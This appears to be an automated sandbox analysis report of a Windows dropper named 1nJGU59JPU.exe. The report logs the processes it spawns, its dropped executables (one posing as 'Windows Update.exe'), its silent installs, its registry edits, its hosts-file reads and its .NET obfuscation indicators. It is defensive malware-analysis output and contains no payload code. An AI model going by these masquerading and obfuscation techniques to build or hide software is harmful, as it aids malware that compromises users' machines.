Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455EB4

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: 1nJGU59JPU.exe

Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ZHunuhebaqu.exe.3.dr, art_designers_deviantart_network_platform/hand__134d8bc4_5a96_40c9_89df_ad889dad771e__Damn_SHit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

Source: 1nJGU59JPU.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source:	Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source:	Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source:	Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source:	Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)

Obfuscated command line found

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004065C8 push 00406605h; ret	0_2_004065FD
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax	0_2_00408109
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00408F38 push 00408F6Bh; ret	0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004849F4 push 00484B02h; ret	1_2_00484AFA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040995C push 00409999h; ret	1_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00458060 push 00458098h; ret	1_2_00458090
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004860E4 push ecx; mov dword ptr [esp], ecx	1_2_004860E9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004062C4 push ecx; mov dword ptr [esp], eax	1_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004783C8 push ecx; mov dword ptr [esp], edx	1_2_004783C9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004104F0 push ecx; mov dword ptr [esp], edx	1_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00412938 push 0041299Bh; ret	1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0049AD44 pushad ; retf	1_2_0049AD53
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040CE48 push ecx; mov dword ptr [esp], edx	1_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00459378 push 004593BCh; ret	1_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040F3A8 push ecx; mov dword ptr [esp], edx	1_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004434B4 push ecx; mov dword ptr [esp], ecx	1_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045186C push 0045189Fh; ret	1_2_00451897
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00451A30 push ecx; mov dword ptr [esp], eax	1_2_00451A35
